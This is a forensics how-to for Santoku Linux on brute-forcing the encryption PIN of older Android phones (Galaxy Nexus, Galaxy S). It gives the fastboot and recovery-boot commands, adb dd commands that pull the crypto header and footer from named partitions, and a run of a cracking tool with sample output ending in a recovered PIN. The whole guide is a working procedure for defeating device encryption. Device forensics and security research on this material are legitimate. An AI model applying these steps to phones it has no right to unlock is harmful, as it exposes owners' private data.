HOWTO Brute Force Android Encryption on Santoku Linux
- What you will need
- Putting your device in ‘Fastboot’ mode
- Boot to a recovery image
- Pull the required header and footer files
- Run the Brute Force encryption program
- Contribute cycles
- Revision History
- Santoku – Alpha 0.3 (or later)
- Android Brute Force Encryption tool (bundled)
- A Samsung Galaxy Nexus or Galaxy S (The device must be Android version 4.0 or higher with an unlocked bootloader)
- An Android recovery image that allows you root access
First, we need to put the phone in recovery mode so we can boot the custom recovery image. If your device already has a custom recovery image with root address installed, you can skip this step.
There’s and easy way to accomplish this (adb) and a more difficult one (Vulcan death grip). If you have a device with adb enabled, simply connect it to Santoku (make sure you pass it through if running in a VM), run an LXTerminal and issue this command:
adb reboot bootloader
Otherwise, you can use various keys combinations to access fastboot.
- Turn the device off
- Press and hold the volume up button
- Press and hold the power button
- Turn the device off
- Press and hold the both volume buttons
- Press the power button
After completing this step, you should see a screen like this (serial number blurred for security):
Next, we’ll boot the device from a rooted recovery image. For this guide, we used Clockwork Mod but you can use any device compatible recovery image with root and adbd enabled. Note where you saved the recovery image. For this example, we placed the image in the Downloads directory.
From an LxTerminal, we’ll run fastboot and make sure we can communicate with the device:
cd /opt/santoku/fastboot ./fastboot-linux-i386 devices
You should see the device serial number as follows:
If you do not see this, make sure the device is connected and passed through if you are running in a VM. Also, for some devices, you may need to run fastboot as root if see the following:
In that case, try the following:
sudo ./fastboot-linux-i386 devices
If this works, preface future fastboot commands with sudo as well.
Now that we’ve verified we can communicate with the device over fastboot, let’s boot using the recovery image:
./fastboot-linux-i386 boot ~/Downloads/recovery-clockwork-188.8.131.52-crespo4g.img
Which should reboot the device into your recovery image. The output to the terminal looks as follows:
downloading 'boot.img'... OKAY booting... OKAY
Your devices should be sitting in recovery mode now. Next, we are going to pull the needed header and footer data so we can brute force the encryption pin. The location varies by device so choose the steps for your particular device type.
adb shell dd if=/dev/block/mmcblk0p2 of=tmp_header bs=512 count=1 adb pull tmp_header ~/Desktop/tmp_header
adb shell mkdir /efs adb shell mount -t yaffs2 /dev/block/mtdblock6 /efs adb pull /efs/userdata_footer ~/Desktop/tmp_footer
adb shell dd if=/dev/block/mmcblk0p12 of=tmp_header bs=512 count=1 adb pull tmp_header ~/Desktop/tmp_header
adb shell dd if=/dev/block/mmcblk0p13 of=tmp_footer adb pull tmp_footer ~/Desktop/tmp_footer
We now have everything thing we need so we’ll run the Android Brute Force Encryption cracking program against the header and footer files. By default, we test 4-digit numeric passcodes but you can change the number of digits to test. To run the program, launch it under Santoku –> Device Forensics –> Android Brute Force Encryption. Then run it against the header and footer files:
bruteforce_stdcrypto ~/Desktop/tmp_header ~/Desktop/tmp_footer
The program will output information about the footer file and then brute force the password:
Defaulting max PIN digits to 4 Footer File : /home/santoku/Desktop/tmp_footer Magic : 0xD0B5B1C4 Major Version : 1 Minor Version : 0 Footer Size : 104 bytes Flags : 0x00000000 Key Size : 128 bits Failed Decrypts: 0 Crypto Type : aes-cbc-essiv:sha256 Encrypted Key : 0xE51861649D0005F874AD6CCAB6DF2C61 Salt : 0xA163525990AC7A053E1E372914999BE8 ---------------- Trying to Bruteforce Password... please wait Trying: 0000 Trying: 0001 Trying: 0002 Trying: 0003 Trying: 6426 Trying: 6427 Trying: 6428 Found PIN!: 6428
This took just over 45 seconds while running Santoku in a VM. You can now use the passcode to boot the device and access the encrypted data.
- Expanding beyond numeric passcodes
- Decrypt the raw file system
- Speed optimizations